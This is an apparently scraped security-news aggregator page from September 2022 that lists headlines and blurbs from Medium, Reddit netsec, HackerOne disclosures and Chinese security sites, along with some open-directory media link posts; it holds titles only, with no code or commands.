    What is wifi hacking ? Continue reading on Medium »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    All about: IDORs
    IDORs happen when users can **access resources that do not belong to them** by directly reference the object ID, object number, or… Continue reading on Medium »
    Once upon a time, There lived a GHOST named “CYBERSECURITY”
    I am writing this blog after seeing the evolution of cybersecurity in the past few months or years. I thought of starting this blog with… Continue reading on Medium »
  • Open

    The Confusing Lifetimes of AWS IAM Identity Center Access Tokens
    submitted by /u/csanders_ [link] [comments]
    Kerberos: New Attack Paths? AS Requested Service Tickets
    submitted by /u/sanitybit [link] [comments]
    Talking Trojan: Analyzing an Industry-Wide Disclosure
    submitted by /u/sanitybit [link] [comments]
    LuaJIT hacking: Crafting Shellcodes
    submitted by /u/pwntheplanet [link] [comments]
    GitHub - jafarlihi/connmap: connmap is an X11 desktop widget that shows location of your current network peers on a world map (tested only with i3wm). Made with C and libcairo.
    submitted by /u/jafarlihi [link] [comments]
    Another Tale of IBM i (AS/400) Hacking
    submitted by /u/buherator [link] [comments]
    A Deep Dive Into the APT28’s stealer called CredoMap
    submitted by /u/CyberMasterV [link] [comments]
    When Hypervisor Met Snapshot Fuzzing
    submitted by /u/jeandrew [link] [comments]
    Enhance your malware detection with WAF + YARA (WAFARAY)
    submitted by /u/alt3kx [link] [comments]
  • Open

    Porn, music, OSTs, movies, animes, audiobooks, latest TV shows and Cyberpunk game
    http://212.83.137.51/ submitted by /u/MuhPornAcc69 [link] [comments]
    Movies/TV Shows [NSFW]
    Was looking for HotD episodes and stumbled upon these: https://cd.awsitsolution.xyz/ http://54.39.52.63/ http://file.khulnaflix.net/ http://54.36.106.156/ http://103.155.150.26/data/ http://palpha.myqnapcloud.com/My_TV_Shows/ http://eagles-nest.net/Uploadz/ -- [VERY NSFW] not even sure why this was in the results submitted by /u/JasonSec [link] [comments]
    Can't download stuff from an opendir.
    New to this. I found an opendir with some video files I'd like to view/download. Problem is, I cant do that. I tried VLC, Jdownloader, IDM and XDM but there is no way. I don't get errors, it just does nothing. Am I missing something? Link submitted by /u/RadAway- [link] [comments]
    Random Stuff
    https://dl.gamefa.com/user1/ https://dl.gamefa.com/user2/ https://dl.gamefa.com/user3/ https://dl.gamefa.com/user4/ https://dl.gamefa.com/user5/ submitted by /u/ilikemacsalot [link] [comments]
    TV Shows and Movies
    http://51.158.153.210 Most of them are MP4s submitted by /u/ilikemacsalot [link] [comments]
  • Open

    CSV export/import functionality allows administrators to modify member and message content of a workspace
    Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 - Bounty: $250
    Take over subdomains of r2.dev using R2 custom domains
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 - Bounty: $1125
    DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)
    Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921
    Server-side request forgery (ssrf)
    Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240
    Directory Listing vulnerability on .packet8.net/php/include/
    8x8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846
    CORS Misconfiguration on Yelp
    Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616
  • Open

    What website do you you know that end with the ".tools" domain name?
    I have discovered that I can still fully access a website I frequent that ends with ".tools" even when my ISP goes down. I wish to see if I can access any website that ends with this extension ... and then I'll need to figure out how I can exploit this XP submitted by /u/Aeromorpher [link] [comments]
  • Open

    Write-up: Authentication bypass via flawed state machine @ PortSwigger Academy
    No content preview
    Integrated Approach for Application Security and Security Operations Center using data correlation…
    No content preview
    Cloud Security Tooling Series — What the heck is a CSPM ?
    Understanding the concept of Cloud Security Posture Management (CSPM) Continue reading on InfoSec Write-ups »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    ‍ $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS…
    No content preview
    CVE-2022–36934: An integer overflow in WhatsApp leading to remote code execution in an established…
    No content preview
    A Tale of Account Takeover
    No content preview
    CVE-2022–27492: An integer underflow in WhatsApp causing remote code execution when receiving a…
    No content preview
    Writing and Using Python Burp Extension — Adding a Custom Header Field
    No content preview
  • Open

    Write-up: Authentication bypass via flawed state machine @ PortSwigger Academy
    No content preview
    Integrated Approach for Application Security and Security Operations Center using data correlation…
    No content preview
    Cloud Security Tooling Series — What the heck is a CSPM ?
    Understanding the concept of Cloud Security Posture Management (CSPM) Continue reading on InfoSec Write-ups »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    ‍ $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS…
    No content preview
    CVE-2022–36934: An integer overflow in WhatsApp leading to remote code execution in an established…
    No content preview
    A Tale of Account Takeover
    No content preview
    CVE-2022–27492: An integer underflow in WhatsApp causing remote code execution when receiving a…
    No content preview
    Writing and Using Python Burp Extension — Adding a Custom Header Field
    No content preview
  • Open

    Write-up: Authentication bypass via flawed state machine @ PortSwigger Academy
    No content preview
    Integrated Approach for Application Security and Security Operations Center using data correlation…
    No content preview
    Cloud Security Tooling Series — What the heck is a CSPM ?
    Understanding the concept of Cloud Security Posture Management (CSPM) Continue reading on InfoSec Write-ups »
    How To Attack Admin Panels Successfully
    Attacking Web Apps Admin Panels The Right Way Continue reading on InfoSec Write-ups »
    ‍ $600k Bounty, Jetty Features, Response Queue Poisoning, Bypass SSRF Protections, XSS…
    No content preview
    CVE-2022–36934: An integer overflow in WhatsApp leading to remote code execution in an established…
    No content preview
    A Tale of Account Takeover
    No content preview
    CVE-2022–27492: An integer underflow in WhatsApp causing remote code execution when receiving a…
    No content preview
    Writing and Using Python Burp Extension — Adding a Custom Header Field
    No content preview
  • Open

    SecWiki News 2022-09-28 Review
    红队视角下的AWS横向移动 by ourren 可信密态计算白皮书 by ourren [HTB] Silo Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-28 Review
    红队视角下的AWS横向移动 by ourren 可信密态计算白皮书 by ourren [HTB] Silo Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Vulnerability in Apache Pulsar allowed manipulator-in-the-middle attacks
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-apache-pulsar-allowed-manipulator-in-the-middle-attacks Comments URL: https://news.ycombinator.com/item?id=33009155 Points: 2 # Comments: 0
  • Open

    #100DaysOfHacking Day 89
    Guess what TryHackMe gave me Continue reading on Medium »
    Shortcut Attack — Captura do Hash NTLMv2
    Veja como é simples realizar a captura do Hash NTLMv2 através de um atalho (shortcut) na área de trabalho da vítima. Continue reading on 100security »
  • Open

    FreeBuf早报 | 美国网攻西工大另一图谋曝光;Meta大规模关闭俄罗斯欺诈新闻网站
    渗透控制中国基础设施核心设备,窃取中国用户隐私数据,入侵过程中还查询一批中国境内敏感身份人员。
    DVWA解题步骤
    这里要用到sql的基本知识,在此就不多做赘述。
    全国信安标委发布《信息安全技术 网络安全众测服务要求》(征求意见稿)
    网络安全众测服务是指,以自愿的方式组织非特定的自然人或组织,在审计及监督下,对网络产品和系统等开展漏洞发现等安全测试的过程。
    WebLogic 反序列化漏洞深入分析
    知己知彼,学习洞悉攻击者的思路有助于优化漏洞修补策略,也能更好的提升防御水平。
    以色列国防巨头埃尔比特系统美国分公司遭黑客攻击
    以色列国防承包商埃尔比特系统美国分公司网络在6月初遭到黑客攻击。
    一次老版本jboss反序列化漏洞的利用分析
    一次老版本jboss反序列化漏洞的利用分析。
    韩国数据合规重点解读
    在数字经济的推动下,韩国已具备成熟的数据保护法律体系,也成为数据监管最为严格的国家之一。
    美国网攻西工大另一图谋曝光:查询中国境内敏感身份人员信息
    进一步揭露了美国对西北工业大学组织网络攻击的目的:渗透控制中国基础设施核心设备,窃取中国用户隐私数据等。
  • Open

    CVE-2022-40674: libexpat before 2.4.9 has a use-after-free in xmlparse.c
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-40674 Comments URL: https://news.ycombinator.com/item?id=33006691 Points: 1 # Comments: 0
  • Open

    Tool to unlock SD-cards
    Hi there, I am working on a SD-card that is password protected. Can anyone recommend a (prefered Linux) tool to unlock the card? submitted by /u/Knuust [link] [comments]
    Signal Extraction/Parsing iOS?
    Has anyone been able to extract Signal data on iOS with known passcodes? If so, which tool? We have Axiom and Cellebrite but have not had success. Perhaps via parsing a Signal backup? submitted by /u/Plane-Woodpecker1517 [link] [comments]
  • Open

    Freeze - Payload Generation Toolkit for Bypassing EDR
    submitted by /u/roobixx [link] [comments]
  • Open

    Trip.com: Large Scale Cloud Native Networking & Security with Cilium/eBPF (eBPFSummit, 2022)
    This is an entended version of our talk at eBPF Summit 2022: Large scale cloud native networking and security with Cilium/eBPF: 4 years production experiences from Trip.com. This version covers more contents and details that’s missing from the talk (for time limitation). Abstract 1 Cloud Infrastructure at Trip.com 1.1 Layered architecture 1.2 More details 2 Cilium at Trip.com 2.1 Timeline of rolling out 2.2 Customizations 2.3 Optimizations & tunings 2.3.1 Decouple installation 2.3.2 Avoid retry/restart storms 2.3.3 Stability first 2.3.4 Planning for scale 2.3.5 Performance tuning 2.3.6 Observability & alerting 2.3.7 Misc options 2.4 Multi-cluster solution 2.4.1 ClusterMesh 2.4.2 KVStoreMesh 3 Advanced trouble shooting skills 3.1 Debugging with delve/dlv 3.2 Trac…

  • Open

    Where to go from here?
    Hi all. Just recently obtained GCFA. Also obtained GCFE, GCIH, GCTI in the past two years, been very fortunate. In the next year, I figure I will go for the GIME (MacOS and iOS), and another SANS, not sure on that one (thought about GNFA, or maybe GPEN, just for fun, GREM has also crossed my mind). But eventually, I’ll need to look beyond SANS for training, and I am not sure where to take things. I would like to be “well rounded,” so to speak. Reverse engineering interests me, but also seems daunting and not completely my bag. Currently working in an IR role with the occasional forensics case. I guess, since I’m at least familiar with Windows, and have a plan for MacOS, the obvious gap is Linux. Is Hal Pomeranz basically the place to start? Haven’t looked much into resources for Linux based forensics, but would love to learn. In general, just looking for what’s useful for DFIR careers so I can continue expanding knowledge and developing skills. submitted by /u/KillithidMindslayer [link] [comments]
    How is the $mft, $logfile... Data hidden
    Hi, im making some forensics investigations and i dont know if any of you know how can you hide a file just like $mft or if anyone knows what does windows do to hide it. I know that there are several ways to see it but im still curious to know if you can hide any file just like that submitted by /u/Pasiones [link] [comments]
    Data Remediation Utilities
    What are you all using for Data Remediation that you can recommend? We have a mix of PC / OSX systems and looking to secure erase individual files. Usually I would create a Batch script for SDelete but wanting to go about this differently. Preferably something with a UI that can generate a certificate of destruction. If it can be run in a portable fashion from an external without needing installation that would be great too. Kill Disk looks promising but they have so many different versions it's hard to tell what I need. Has anyone used this before? Appreciate any recommendations. submitted by /u/no_sushi_4_u [link] [comments]
    Hardware encrypted usb suggestions??
    What products are we using for hardware encrypted drives to move data around and store forensic data securely? submitted by /u/dfzachary [link] [comments]
  • Open

    Latest from #princessmthombeni
    submitted by /u/DusyaLove1 [link] [comments]
    one of the better sources >>>>>
    https://old.reddit.com/r/CollapsePrep/comments/xoan2m/stumbled_across_a_gem_of_a_page_back_from_the_dead/ submitted by /u/illiniwarrior [link] [comments]
    Cyberpunk - Edgerunners
    Sorry I know it been posted before but I really was looking for this lot. Big files but.... http://212.83.137.51/TDownloads/Cyberpunk - Edgerunners - S01 - MULTi 1080p WEB x264 -NanDesuKa (NF)//) submitted by /u/Hyp3rionX [link] [comments]
  • Open

    password field autocomplete enabled
    Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773
    insecure gitlab repositories at [HtUS]
    U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 - Bounty: $500
    XSS Reflected on reddit.com via url path
    Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 - Bounty: $5000
  • Open

    NO RATE LIMITING
    Hello Folks so this is my first write-up and its a special one since this is the beginning of writing more content Continue reading on Medium »
    NFTuLoan Partners with Immunefi, Web3’s Leading Bug Bounty Platform to offer $10,000 Bounty Reward
    NFTuLoan is excited to announce its new partnership with Immunefi. While NFTuloan focuses on the NFT aspect of blockchain technology… Continue reading on Medium »
    Tools for Bug Bounty
    Wassup bug hunters! 🚀 Continue reading on Medium »
    Multi-Factor Authentication Vulnerabilities
    Hi, my name is Hashar Mujahid and in this blog, we will discuss MFA and the most common MFA vulnerabilities that might occur. Continue reading on InfoSec Write-ups »
  • Open

    The difference between signature-based and behavioural detections
    submitted by /u/S3cur3Th1sSh1t [link] [comments]
    Ken Thompson Really Did Launch His "Trusting Trust" Trojan Attack in Real Life
    submitted by /u/nic0nicon1 [link] [comments]
    Detecting and Mitigating the GateKeeper User Override on macOS in an Enterprise Environment
    submitted by /u/sanitybit [link] [comments]
    Audit your DNS config, you'd be shocked at how bad it can get
    submitted by /u/punksecurity_simon [link] [comments]
    Diving Into Electron Web API Permissions
    submitted by /u/nibblesec [link] [comments]
    A technical analysis of Pegasus for Android – Part 2
    submitted by /u/CyberMasterV [link] [comments]
    Skidaddle Skideldi - I just pwnd your PKI
    submitted by /u/0xdea [link] [comments]
    Vulnerability in WhatsApp mobile apps could result in remote code execution in an established video call (CVSS 9.8)
    submitted by /u/qwerty0x41 [link] [comments]
  • Open

    The difference between signature-based and behavioural detections
    submitted by /u/S3cur3Th1sSh1t [link] [comments]
    Looking for Incident Responders, TI Analysts, and Researchers to Join
    submitted by /u/ChineseAPTsEatBabies [link] [comments]
  • Open

    New Malware Variants Serve Bogus CloudFlare DDoS Captcha
    When attackers shift up their campaigns, change their payload or exfiltration domains, and put some extra effort into hiding their malware it’s usually a telltale sign that they are making some money off of their exploits. One such campaign is the fake CloudFlare DDoS pages which we reported on last month. The attack is simple: when browsing an infected website, the user receives a notification that insists they must download a file to continue to access the content. Continue reading New Malware Variants Serve Bogus CloudFlare DDoS Captcha at Sucuri Blog.
  • Open

    Complete take-over of Cisco Unified Communications Manager due consecutively misconfigurations
    No content preview
    SANS Top 25 Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write
    No content preview
    How to exploit DOM XSS on DVWA — StackZero
    In this write-up we are going to we will learn how to pass all levels of DOM XSS on DVWA so we can better understand that vulnerability. Continue reading on InfoSec Write-ups »
    Multi-Factor Authentication Vulnerabilities
    No content preview
  • Open

    Complete take-over of Cisco Unified Communications Manager due consecutively misconfigurations
    No content preview
    SANS Top 25 Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write
    No content preview
    How to exploit DOM XSS on DVWA — StackZero
    In this write-up we are going to we will learn how to pass all levels of DOM XSS on DVWA so we can better understand that vulnerability. Continue reading on InfoSec Write-ups »
    Multi-Factor Authentication Vulnerabilities
    No content preview
  • Open

    Complete take-over of Cisco Unified Communications Manager due consecutively misconfigurations
    No content preview
    SANS Top 25 Software Errors (Part 1 of 25): CWE-787 Out-of-bounds Write
    No content preview
    How to exploit DOM XSS on DVWA — StackZero
    In this write-up we are going to we will learn how to pass all levels of DOM XSS on DVWA so we can better understand that vulnerability. Continue reading on InfoSec Write-ups »
    Multi-Factor Authentication Vulnerabilities
    No content preview
  • Open

    UAF and House Of Force Fun - ROMHack CTF Swordmaster Pwn Challenge
    submitted by /u/0xcalico [link] [comments]
  • Open

    SANS Top 25 Software Errors (Part 2 of 25)
    CWE-79 Improper Neutralization of Input During Web Page Generation (Cross-site Scripting) Continue reading on CodeX »
  • Open

    SecWiki News 2022-09-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-27 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Working with data in JSON format
    What is JSON? What is JSON? JSON is an acronym for JavaScript Object Notation. For years it has been in use as a common serialization format for APIs across the web. It also has gained favor as a format for logging (particularly for use in structured logging). Now, it has become even more common for... The post Working with data in JSON format appeared first on TrustedSec.
  • Open

    More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID
    Polyglot files, such as the malicious CHM file analyzed here, can be abused to hide from anti-malware systems that rely on file format identification. The post More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID appeared first on Unit 42.
  • Open

    Edward Snowden Is a Russian Citizen Now
    “After two years of waiting and nearly ten years of exile…” Continue reading on Medium »
    CHALLENGE GEO LOC
    Challenge proposé sur le Discord OSINT FR. Vous trouverez ci-après la correction. Continue reading on Medium »
  • Open

    WitAwards 2022中国网络安全行业年度评选正式启动!
    即日起,WitAwards 2022中国网络安全行业年度评选正式启动,共设立五大奖项,并将在CIS 2022网络安全创新大会现场揭晓并颁奖。
    FreeBuf早报 | 澳大利亚将全面修订隐私法;欧盟 ENISA 发布网络安全技能框架
    俄罗斯总统普京授予NSA 告密者斯诺登俄罗斯公民身份。
    匿名者向伊朗政府宣战,发起OpIran运动攻击政府网站
    匿名者(Anonymous)黑客组织宣布发起针对伊朗的OpIran运动,攻击伊朗政府网站,包括情报机构和警方网站。
    普京正式授予斯诺登俄罗斯国籍
    俄罗斯总统普京正式签署命令,授予爱德华·斯诺登俄罗斯国籍,相应文件已发布在法律信息门户网站上。
    乌克兰当局警告盟国,俄罗斯正在计划升级网络攻击
    乌克兰军事情报部门警告称俄罗斯正计划针对乌克兰及其盟国的关键基础设施,进行“大规模网络攻击”。
    鼠标悬停也能中招!带毒PPT正用来传播Graphite恶意软件
    俄罗斯黑客正利用这一技术,让攻击更加隐蔽。
  • Open

    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg 漏洞描述 6月29日,Atlassian官方发布安全公告,在Atlassian Jira 多款产品中存在服务端请求伪造漏洞(SSRF),经过身份验证的远程攻击者可通过向Jira Core REST API发送特制请求,从而伪造服务端发起请...
  • Open

    CVE-2022-26135 Atlassian Jira Mobile Plugin SSRF漏洞分析
    作者:xxhzz@星阑科技PortalLab 原文链接:https://mp.weixin.qq.com/s/VaHYzhkn2gZhHcCPTdO-Tg 漏洞描述 6月29日,Atlassian官方发布安全公告,在Atlassian Jira 多款产品中存在服务端请求伪造漏洞(SSRF),经过身份验证的远程攻击者可通过向Jira Core REST API发送特制请求,从而伪造服务端发起请...

  • Open

    Multiple iSerialNumbers for the same device and other USB oddities
    Who else has seen this behavior that can lend some insight into what is going on? The attached image shows entries within the USBStor key (serial numbers partially crossed-out in blue). You'll see multiple devices have multiple unique iSerialNumbers. I have not come across this before and have only been able to spitball the cause (USB dock in use? Plugged into different hardware ports?). There are some other interesting things going on. The devices identified in orange were all plugged in within an approximately 10-minute period, with different first connect/last connect/last disconnect times for each iSerialNumber. This is shown both in the registry and event logs. The devices marked with a green star appear to be the same device - same VID/PID and no other differentiating characteristics. Any idea what is happening on this computer? I do not have access to the devices, just the host (Windows 10 build 19044). https://preview.redd.it/6eb1vn881aq91.png?width=727&format=png&auto=webp&s=38684ec7d5132a0d47efed5925703fa1e6bc90ae submitted by /u/ebarboza311 [link] [comments]
  • Open

    MemProcFS: An easy and convenient way of viewing physical memory as files in a virtual file system.
    submitted by /u/sanitybit [link] [comments]
    monomorph: MD5-Monomorphic Shellcode Packer - Pack arbitrary shellcode into an executable that always has the same MD5 hash
    submitted by /u/sanitybit [link] [comments]
    Designing an end-to-end encrypted note sharing service
    submitted by /u/0x414141 [link] [comments]
    Vultron: A Protocol for Coordinated Vulnerability Disclosure
    submitted by /u/sanitybit [link] [comments]
    A study of cracked passwords from breaches demonstrates which geographical factors have the most impact on password strength
    submitted by /u/obilodeau [link] [comments]
    When Athletic Abilities Just Aren't Enough - Scoreboard Hacking Part 2
    submitted by /u/mdulin2 [link] [comments]
    Microsoft Shift F10 bypass + Autopilot privilege escalation
    submitted by /u/k4m1ll0 [link] [comments]
  • Open

    Vultron: A Protocol for Coordinated Vulnerability Disclosure
    Article URL: https://insights.sei.cmu.edu/blog/vultron-a-protocol-for-coordinated-vulnerability-disclosure/ Comments URL: https://news.ycombinator.com/item?id=32988651 Points: 2 # Comments: 0
  • Open

    SecWiki News 2022-09-26 Review
    SecWiki周刊(第447期) by ourren Http Request-Smuggling by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-26 Review
    SecWiki周刊(第447期) by ourren Http Request-Smuggling by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    Exploit for Arbitrary File Move vulnerability in ZoneAlarm AV [PDF+EXPLOIT]
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Main Domain Takeover at https://www.marketo.net/
    Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914
  • Open

    How to Translate Videos and Documents for OSINT Investigations
    He who knows no foreign languages knows nothing of his own. Continue reading on The Sleuth Sheet »
    OhSINT TryHackMe Challenge
    Using Open Source Intelligence Continue reading on Medium »
    I found your keys — secrets on GitHub
    Secrets are, well, secrets, and it boggles the mind that I frequently find them on GitHub. In this post, we will discuss how I often… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #7
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Top 10 Podcasts for Intelligence, Security and Geopolitics
    There’s been a significant increase in consumption of audio-only content over the last decade with reports estimating that there’ll be… Continue reading on Medium »
    How I Can Use Your Gmail Account to Find Out Where You Live and Possibly More
    Disclaimer: All information and techniques provided in this article are for educational purposes only. I will not be held responsible for… Continue reading on Medium »
  • Open

    JSON web tokens
    For decades cookies have been used to authenticate a user and hold session data. But a simple session cookie has certain limitations and… Continue reading on InfoSec Write-ups »
    Monitoring your targets for bug bounties
    No content preview
    Top 10 Dockerfile Security Best Practices for a More Secure Container
    No content preview
    Android Hardening Guide
    No content preview
    Connect State Attack — First Request Validation
    No content preview
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
    No content preview
  • Open

    JSON web tokens
    For decades cookies have been used to authenticate a user and hold session data. But a simple session cookie has certain limitations and… Continue reading on InfoSec Write-ups »
    Monitoring your targets for bug bounties
    An intro to setting up a monitoring system for your bug bounty target Continue reading on InfoSec Write-ups »
    Tryhackme 0day Makine Çözümü
    Açıklama: Selam arkadaşlar, Tryhackme platformunda bulunan ‘0day’ isimli makinenin çözümünü sizinle paylaşıyor olacağım. Bu makinede… Continue reading on Medium »
    Nmap in pocket : A complete guide
    Welcome Hackers, Continue reading on Medium »
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
    Hola Amigo!! Continue reading on InfoSec Write-ups »
    Journey to my first bug
    Yeah this is my first blog ever… It took me 4 Months + 2 Months gap = 6 Months, 2–3 hrs Each day to reach my first valid bug. Continue reading on Medium »
    Bug Bounty Reference
    Introduction Continue reading on Medium »
    Consejo de Seguridad e Iniciativa de Maquina “Airdrop”
    Desde el comienzo de Hats, visualizamos un futuro en el que las comunidades, los desarrolladores y los expertos en seguridad colaboran… Continue reading on Medium »
  • Open

    JSON web tokens
    For decades cookies have been used to authenticate a user and hold session data. But a simple session cookie has certain limitations and… Continue reading on InfoSec Write-ups »
    Monitoring your targets for bug bounties
    No content preview
    Top 10 Dockerfile Security Best Practices for a More Secure Container
    No content preview
    Android Hardening Guide
    No content preview
    Connect State Attack — First Request Validation
    No content preview
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
    No content preview
  • Open

    JSON web tokens
    For decades cookies have been used to authenticate a user and hold session data. But a simple session cookie has certain limitations and… Continue reading on InfoSec Write-ups »
    Monitoring your targets for bug bounties
    No content preview
    Top 10 Dockerfile Security Best Practices for a More Secure Container
    No content preview
    Android Hardening Guide
    No content preview
    Connect State Attack — First Request Validation
    No content preview
    HTML Injection inside Email body- The First BUG I hunted down in a Bug Bounty Platform!
    No content preview
  • Open

    Hunting for Unsigned DLLs to Find APTs
    Hunting for the loading of unsigned DLLs can help you identify attacks and threat actors in your environment. Our examples include well-known APTs. The post Hunting for Unsigned DLLs to Find APTs appeared first on Unit 42.
  • Open

    FreeBuf早报 | 匿名者向伊朗政府宣战;TikTok因儿童隐私数据保护面临2700万英镑罚款
    当地时间9月25日,匿名者向伊朗政府宣战,并发起了针对政府网站的#OpIran运动。
    GitHub用户注意,网络钓鱼活动冒充CircleCI窃取凭证
    有网络钓鱼活动冒充CircleCI DevOps平台,瞄准GitHub用户窃取证书和双因素身份验证(2FA)代码。
    澳大利亚史上最大数据泄露事件,40%的居民信息被泄露
    此次数据泄露事件波及人数达到该国40%的左右的人口,并成为澳大利亚史上最大的网络安全事件之一。
    “匿名者”组织声称黑进了俄罗斯国防部网站
    匿名者黑客组织声称已成功入侵俄罗斯国防部网站并泄露 305925 人的数据信息。
    为防钓鱼,Win11新版本在记事本、网站中输入密码时会发出警告
    新发布的Windows 11 22H2附带增强网络钓鱼防护的新安全功能,当用户在不安全的应用程序或网站上输入Windows密码时会发出警告。
    全国首个城市(地区)图谱 | 成都网络安全特色企业图谱(第一版)发布
    旨在助力成都打造网络安全之城,共同构建西部地区网络安全新生态,促进全国网络安全产业健康发展。
  • Open

    A couple of series, a couple of films.
    English subtitles included for all shows. https://drive.google.com/drive/folders/1JQ9lHYHLHJ8nXIpywuuCq4V89Phr5qry?usp=sharing submitted by /u/GeniusOfLove74 [link] [comments]
    Searching for vulnerable directory listings??
    Came across this blog (https://blog.criminalip.io/2022/09/22/google-hacking/) that compared Google Hacking and Criminal IP when looking for vulnerable directory listings. What do you guys think is better? It does mention that Criminal IP shows more data than Google Hacking but Google Hacking has more filters than Criminal IP. Any opinion would be very much appreciated. Thanks! submitted by /u/Glad_Living3908 [link] [comments]
  • Open

    Bug Bounty Reference
    Introduction Continue reading on Medium »
  • Open

    Bumblebee 恶意软件带着新感染技术回归
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/ 使用后开发框架交付有效负载 在我们的例行威胁搜寻活动中,Cyble Research & Intelligence Labs (CRIL) 发现了一条Twit...
    MiraclePtr UAF 漏洞利用缓解技术介绍
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw 2022年9月13日,Google安全团队在其安全博客中发布了一篇关于MiraclePtr的文章,介绍了Google Chrome安全团队在缓解UAF漏洞利用上的进展。由于MiraclePtr并不是单指某一种智能指针技术,而是包含了Google安全团...
  • Open

    Bumblebee 恶意软件带着新感染技术回归
    作者:威胁情报团队 译者:知道创宇404实验室翻译组 原文链接:https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/ 使用后开发框架交付有效负载 在我们的例行威胁搜寻活动中,Cyble Research & Intelligence Labs (CRIL) 发现了一条Twit...
    MiraclePtr UAF 漏洞利用缓解技术介绍
    作者:墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw 2022年9月13日,Google安全团队在其安全博客中发布了一篇关于MiraclePtr的文章,介绍了Google Chrome安全团队在缓解UAF漏洞利用上的进展。由于MiraclePtr并不是单指某一种智能指针技术,而是包含了Google安全团...

  • Open

    Reflected xss on videostore.mtnonline.com
    MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248
  • Open

    Need Magnet Axiom Price for College Paper
    I am writing a paper for a computer forensics class, and need to compare forensic tools for Mac and iOS devices, including their costs. Magnet doesn't list the price on their website, and Google failed in finding me even an estimate. What is the price for the purchase of one Magnet Axiom license? submitted by /u/PMmeagoodstory [link] [comments]
    Adjacent Careers to Digital Forensics
    Hello Everyone, I’ve been perusing the threads here and the consensus seems to be that digital forensics is a difficult field to break into. In fact, it appears that many people get a job in DF after working in either law enforcement or another area of information technology altogether. Previously, I had worked in insurance claims adjusting and then went back to school to study DF (being a claims adjuster wasn’t for me, but that’s another story). I got my Bachelor of Science last August. Currently, I’m working a general IT help desk / software support job and making less money than before I started my DF degree. I’m also not using any of the skills I learned in class, and there do not appear to be any opportunities to do so with my present employer. I have reached out to my school’s career center for guidance and despite repeated phone calls never heard anything back. Also attended career fairs and made contacts, tried reaching out to people on LinkedIn, etc. Does anyone have suggestions for adjacent careers that use DF skills and also have a good amount of entry level opportunities? submitted by /u/ZergBah [link] [comments]
  • Open

    Google VRP Teaser - Today I Learned
    submitted by /u/TechbrunchFR [link] [comments]
    Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.
    submitted by /u/ergrelet [link] [comments]
    Sleep obfuscation technique leveraging waitable timers to evade memory scanners.
    submitted by /u/Idov31 [link] [comments]
  • Open

    UBER: The Personal Vendetta
    submitted by /u/banginpadr [link] [comments]
  • Open

    SecWiki News 2022-09-25 Review
    针对U盘文件的盗与防攻略 by 路人甲 goby指纹提取与yara逆向.md by 路人甲 某开源堡垒机历史漏洞分析 by 路人甲 谈谈最近失败的挖洞经历 by ourren git-vuln-finder: Finding potential software vulnerabilities from git commit by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-09-25 Review
    针对U盘文件的盗与防攻略 by 路人甲 goby指纹提取与yara逆向.md by 路人甲 某开源堡垒机历史漏洞分析 by 路人甲 谈谈最近失败的挖洞经历 by ourren git-vuln-finder: Finding potential software vulnerabilities from git commit by ourren 更多最新文章,请访问SecWiki
  • Open

    UBER: The Personal Vendetta
    Never underestimate someone’s ability Continue reading on Dev Genius »
    Tesla paid me $10,000 because of Directory Indexing
    Many people are interested in trying Bug Bounties, but they feel they won’t be able to find anything. I hope that my success will serve as… Continue reading on Medium »
    eWPT to eWPTX Certified in 45 days (without INE labs) — Exam Review and Tips
